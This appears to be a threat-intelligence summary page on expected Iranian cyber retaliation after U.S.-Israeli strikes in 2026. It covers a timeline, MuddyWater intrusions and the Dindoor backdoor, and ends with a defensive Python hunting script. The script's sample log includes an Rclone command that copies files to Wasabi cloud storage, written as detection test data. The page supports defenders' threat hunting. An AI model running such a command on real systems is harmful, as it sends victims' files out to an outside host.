Iran Retaliation Cyber Risk After U.S. and Israeli Strikes
Coordinated U.S. and Israeli strikes on Iranian targets have raised expectations of Iranian state-aligned cyber retaliation against U.S., Israeli, and allied interests. Reporting and vendor intelligence assessments warn that Iran has historically paired kinetic escalation with cyber operations ranging from low-level disruption (website defacements and DDoS) to higher-impact activity (ransomware-style disruption, hack-and-leak operations, espionage, and destructive/wiper malware), with likely targeting pressure on government, critical infrastructure, defense, financial services, academia, and media. The situation is described as fast-moving, with no definitive public attribution yet tying major new cyber campaigns directly to the latest strikes.
Separately, multiple reports highlight unrelated security issues: GreyNoise observed large-scale reconnaissance and SSL VPN enumeration against SonicWall SonicOS devices via commercial proxy infrastructure—activity consistent with precursor targeting that often precedes credential attacks and ransomware intrusions. CISA also issued updated technical details on RESURGE, a stealthy implant used in zero-day exploitation of Ivanti Connect Secure via CVE-2025-0282, including passive C2 behavior and TLS-fingerprint-based authentication/evasion; Mandiant linked the exploitation to China-nexus activity (UNC5221). Other items in the set include a generic IoT security pitfalls article, a weekly security roundup, and a conference write-up, none of which materially advance the Iran-retaliation storyline.
Timeline
Apr 13, 2026
CISA, NSA, and UK NCSC warn of growing Iranian cyber threat
CISA, the NSA, and the UK NCSC issued a warning that Iranian-aligned cyber activity poses a growing risk amid geopolitical tensions and urged organizations to assume they could be targeted. The advisory highlighted exploitation of unpatched vulnerabilities, weak identity controls, exposed remote access, credential attacks, ransomware-style disruption, and risks to sectors including critical infrastructure and OT/ICS.
Mar 12, 2026
Astaara publishes analysis of Iranian cyber capability
Astaara's analysis on Iranian cyber capability was published, indicating continued public assessment of Iran's cyber posture after the regional escalation. No further details were available in the provided reference.
Mar 3, 2026
Halcyon reports MuddyWater preparing Operation Olalampo
Halcyon said it observed Iranian state-linked group MuddyWater preparing an operation dubbed Operation Olalampo targeting the Middle East, Turkey, and Africa, with overlaps to a separate campaign tracked as RedKitten. The report framed this as part of heightened post-strike cyber risk and warned of possible destructive and disruptive retaliation by Iran-aligned actors.
Feb 28, 2026
Experts warn U.S. defenses may be strained during retaliation risk
Nextgov reported expert concerns that likely Iranian cyber retaliation could test U.S. domestic defenses, especially as CISA's warning and coordination capacity may be constrained by staffing and funding issues. The article highlighted elevated risk to critical infrastructure and operational technology, including internet-facing ICS and PLC environments.
Feb 28, 2026
SentinelOne warns of heightened near-term Iranian cyber risk
SentinelOne published an intelligence brief assessing with high confidence that Iranian state-aligned cyber activity is likely to intensify against organizations in Israel, the United States, and allied nations. The company said it had not yet attributed significant malicious cyber activity directly to the current events and had no indication it or its customers were being specifically targeted at publication time.
Feb 28, 2026
Reports emerge of reduced internet connectivity in Iran
Amid the military escalation, reports indicated reduced internet connectivity in Iran, though the cause was described as uncertain. Commentators suggested cyber, electronic, or signals-intelligence activity may have played a role.
Feb 28, 2026
Iran launches attacks across the region after the strikes
Following the strikes, Iran carried out attacks across the region, further escalating tensions. Analysts cited this escalation as increasing the likelihood of near-term state-aligned Iranian cyber operations.
Feb 28, 2026
U.S. and Israeli strikes hit Iranian targets
Coordinated U.S. and Israeli strikes against Iranian targets triggered a new phase of regional escalation and renewed concern about associated cyber activity. Multiple references describe these strikes as the catalyst for expected Iranian cyber retaliation.
Jun 23, 2025
Sysdig warns June 2025 strikes could spur Iranian cyber activity
Sysdig published a threat bulletin warning that the June 22, 2025 U.S. strikes on Iranian nuclear infrastructure could trigger increased cyber operations by Iranian state-sponsored APTs and pro-Iranian hacktivists. The report highlighted risks to cloud and Linux environments and identified groups including APT35, APT33, and Pioneer Kitten.
Related Stories

US–Israel Cyber Operations Against Iran and Expected Iranian Retaliation
Reporting described a major escalation in **cyber warfare tied to US and Israeli military operations against Iran**, with claims of widespread disruption inside Iran alongside information operations. One account said Iran experienced a near-total digital blackout (connectivity dropping to ~4% of normal), outages affecting government services and communications, and media/PSYOPS-style intrusions (e.g., defacements/injections on pro-regime sites, hijacked messaging via a widely installed prayer app, and interference with broadcast feeds). The same narrative framed the activity as part of a coordinated campaign (described as *Operation Roaring Lion* / *Epic Fury*) and positioned it as a continuation of long-running US–Israel vs. Iran cyber escalation. Threat intelligence and security firms warned that **Iran-linked actors were already mobilizing for reprisal activity** against Israel and potentially Western/allied targets. Cited reporting said Anomali assessed multiple Iranian groups (including **MuddyWater**, **APT42**, and **APT33**) as “activated and retooling,” while noting an unusual lack of visibility into **APT34** that it interpreted as possible covert pre-positioning rather than inactivity. Flashpoint was cited as observing Iran-linked **Handala Group** activity targeting Israeli **industrial control systems (ICS)** and claiming disruption to manufacturing/energy distribution, alongside claims of data theft affecting an Israeli healthcare organization; the overall guidance was to expect heightened Iranian cyber operations in the wake of kinetic strikes.
1 month ago
Iran-Linked Cyber Activity Escalates Amid Middle East Conflict
Iran-nexus cyber activity intensified alongside regional military escalation, with multiple reporting streams describing both opportunistic and targeted operations. Check Point Research observed a coordinated campaign to compromise internet-connected **IP cameras** across Israel, the UAE, Qatar, Bahrain, Kuwait, Lebanon, and Cyprus, with spikes in exploitation attempts aligning to geopolitical events; activity was traced to infrastructure linked to Iran-nexus actors using commercial VPN exit nodes (e.g., *Mullvad*, *ProtonVPN*, *Surfshark*, *NordVPN*) and VPS infrastructure to mask origin, and the most targeted vendors were **Hikvision** and **Dahua**. Separately, Symantec reported **Seedworm** (*MuddyWater/Temp Zagros/Static Kitten*) activity on multiple U.S. and Canadian organizations beginning in February 2026, including a U.S. bank, airport, non-profit, and the Israeli operations of a U.S. software supplier to defense/aerospace; Symantec identified a previously unknown backdoor dubbed **Dindoor** (leveraging the *Deno* runtime) and a Python backdoor **Fakeset**, with malware signed using certificates issued to “**Amy Cherne**” (and in some cases “**Donald Gay**”), and noted attempted data exfiltration using **Rclone** to a *Wasabi* cloud storage bucket. Additional coverage indicates broader pro-Iranian cyber activity but is less specific to the above intrusions. ASEC’s weekly “Ransom & Dark Web Issues” roundup flags **pro-Iranian/pro-Islamist hacktivist** attacks against Middle Eastern and pro-Western targets, but provides limited technical detail in the excerpt.
A podcast episode describing “Iran’s 12 days of cyber war” and global OT targeting (including *Unitronics* PLCs) is largely commentary and retrospective framing rather than a discrete, verifiable incident report, and two other items in the set (a Russia-linked **APT28** phishing/malware campaign in Ukraine and a China-nexus **UAT-9244** telecom intrusion set in South America) describe unrelated threat activity outside the Iran-focused escalation.
1 month ago
Iran-linked MuddyWater intrusions and heightened retaliation risk after U.S.-Israeli strikes
Following the Feb. 28, 2026 U.S.-Israeli strikes on Iran, reporting indicates a **heightened risk of Iranian retaliatory cyber activity** against U.S. and allied organizations, with expected operations spanning **ransomware, DDoS (including as cover for deeper intrusions), data leaks from prior exfiltration, and aggressive social engineering** (e.g., fake job offers and malicious attachments). Likely target sets highlighted include **critical infrastructure**, **banking**, and environments involving **industrial control systems/PLCs**, with emphasis on disciplined execution of security fundamentals (patching, log review, and tighter email/attachment handling) rather than overreliance on automation. Separately, **MuddyWater** (*Seedworm*), an Iran-linked APT, was reported active in multiple U.S. organizations since early Feb. 2026, with activity increasing after the strikes. Symantec and Carbon Black researchers described targeting that included a **U.S. bank**, an **airport**, a **non-profit**, and the **Israel operation of a U.S. software company** supplying the defense/aerospace sector, and identified a previously unknown backdoor, **Dindoor**, observed in several victims; **Dindoor executes via `Deno`** (a JavaScript/TypeScript runtime). Commentary in the reporting also warned to assume potential **pre-positioning** in high-value targets and recommended proactive hunting for signs of persistent access before activation.
1 month ago
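As an added illustration of the "hunt for persistent access" guidance above (example code written here, not taken from Symantec, Carbon Black or any cited report), the following Python sketch checks constructed process-creation events against three observables the stories name: Deno runtime execution, Rclone pointed at Wasabi storage, and binaries signed under the cited signer names. The Wasabi endpoint pattern, the event schema and every sample event are assumptions made for the example.

```python
import json
import re

# Signer names come from the reporting above; the endpoint pattern and the
# event field names are assumptions for this example, not published IoCs.
SUSPECT_SIGNERS = {"amy cherne", "donald gay"}
WASABI_ENDPOINT = re.compile(r"wasabisys\.com", re.IGNORECASE)

def assess_event(event: dict) -> list[str]:
    """Return the hunt findings that one process-creation event triggers."""
    findings = []
    image = event.get("image", "").lower()
    cmdline = event.get("command_line", "")
    signer = event.get("signer", "").lower()
    # Dindoor was reported to run under the Deno runtime; Deno is uncommon on
    # ordinary corporate endpoints, so any launch deserves a look.
    if image.endswith("deno.exe") or image.endswith("/deno"):
        findings.append("deno-runtime-execution")
    # Rclone aimed at a Wasabi endpoint matches the reported exfiltration path.
    if "rclone" in image and WASABI_ENDPOINT.search(cmdline):
        findings.append("rclone-to-wasabi")
    # Campaign malware was signed with certificates issued to these names.
    if signer in SUSPECT_SIGNERS:
        findings.append("suspect-code-signer")
    return findings

def hunt(log_lines: list[str]) -> dict[str, list[str]]:
    """Parse newline-delimited JSON events and group findings by host."""
    hits: dict[str, list[str]] = {}
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed telemetry instead of aborting the hunt
        for finding in assess_event(event):
            hits.setdefault(event.get("host", "unknown"), []).append(finding)
    return hits

# Constructed sample telemetry for demonstration only (not real indicators).
SAMPLE_LOG = [
    '{"host": "ws-01", "image": "C:\\\\Users\\\\u\\\\AppData\\\\Local\\\\deno\\\\deno.exe", "command_line": "deno run -A main.ts", "signer": ""}',
    '{"host": "ws-01", "image": "C:\\\\Temp\\\\rclone.exe", "command_line": "rclone copy D:\\\\docs remote:bucket --s3-endpoint s3.wasabisys.com", "signer": "Amy Cherne"}',
    '{"host": "ws-02", "image": "C:\\\\Windows\\\\System32\\\\notepad.exe", "command_line": "notepad.exe", "signer": "Microsoft Windows"}',
    'not json',
]

if __name__ == "__main__":
    for host, findings in hunt(SAMPLE_LOG).items():
        print(host, findings)
```

Feed it your own EDR or Sysmon process-creation export (one JSON object per line) and treat any host with two or more findings as a priority for the deeper persistence review the reporting recommends.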